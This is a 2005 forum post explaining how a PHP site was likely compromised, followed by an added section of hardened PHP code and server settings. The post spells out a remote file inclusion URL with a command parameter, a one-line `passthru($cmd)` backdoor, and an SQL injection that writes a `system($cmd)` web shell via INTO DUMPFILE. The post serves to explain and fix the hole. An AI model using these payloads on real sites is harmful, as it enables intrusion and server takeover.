Thread: We got hacked.
08-02-2005, 02:45 AM
V_RocKs
Damn Right I Kiss Ass!
 
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,428
Put it back up and I'll tell ya how they did it...

Since you use PHP we will start with some basics...

Either 1, you use templates and they were able to use one of their own:

http://www.paulmarkham.com/all-adult....php?p=contact

Which in code is,
Code:
include($p);
Which means they:

http://www.paulmarkham.com/all-adult...php%3fcmd=Your Unix Command Here

In the file they included was:
Code:
if ($cmd != '') { passthru($cmd); }
Or you are not removing crap that can be sent to the DB so:

http://www.paulmarkham.com/all-adult....php?girl=sara

Becomes:

Code:
http://www.paulmarkham.com/all-adult-content.php?'<? system($cmd); ?>' INTO DUMPFILE '/path/to/website/backdoor.php'--
Of course that would be really simplistic since it would assume that your coder is a complete asshat.

Or it could just be that you have an unpatched version of awstats, phpbb or some other form of free software installed.
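The two patterns in the post above (a request parameter fed straight into include(), and a request parameter spliced into a SQL string) are both fixed the same way: never let the client's bytes reach the interpreter as code. The PHP below is an added example written for this thread, not code from the post or from the site being discussed. It assumes templates live in a ./templates/ directory, that the database is MySQL reached through PDO, and that there is a `girls` table with `id` and `name` columns; all of those names are made up for the illustration.

```php
<?php
// Added example (not from the original post): hardened versions of the two
// patterns described above. Directory layout, table and column names are
// assumptions for the illustration, not the site's real schema.

declare(strict_types=1);

// 1. Template include: the "?p=contact" parameter is a key into a fixed
//    allowlist, not a path. Anything not in the map is rejected, so a
//    remote URL or a path outside ./templates/ can never reach include().
const TEMPLATES = [
    'contact' => 'contact.php',
    'about'   => 'about.php',
    'home'    => 'home.php',
];

function resolveTemplate(string $p): ?string
{
    if (!array_key_exists($p, TEMPLATES)) {
        return null;                        // unknown key: caller sends a 404
    }
    return __DIR__ . '/templates/' . TEMPLATES[$p];
}

// 2. Database lookup: the "?girl=sara" parameter is bound, not concatenated.
//    With a bound value, a quote or an INTO DUMPFILE clause is just text the
//    server compares against `name`; it is never parsed as SQL.
function findGirl(PDO $db, string $girl): ?array
{
    $stmt = $db->prepare('SELECT id, name FROM girls WHERE name = :name');
    $stmt->execute([':name' => $girl]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage at the top of a page script (assumed DSN and credentials):
$template = resolveTemplate((string)($_GET['p'] ?? 'home'));
if ($template === null) {
    http_response_code(404);
    exit('Unknown page');
}

$db = new PDO('mysql:host=localhost;dbname=site', 'webapp', 'password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // let the server do the binding
]);

$girl = findGirl($db, (string)($_GET['girl'] ?? ''));
include $template;
```

Two server-side settings back this up. For the include case, set `allow_url_include=Off` (and ideally `allow_url_fopen=Off`) in php.ini so include() cannot fetch a URL at all, and use `open_basedir` to confine what paths it may read. For the dump-file case, `INTO DUMPFILE` needs the MySQL FILE privilege, so the account the web application connects with should not hold it; then even a successful injection cannot write a file into the web root.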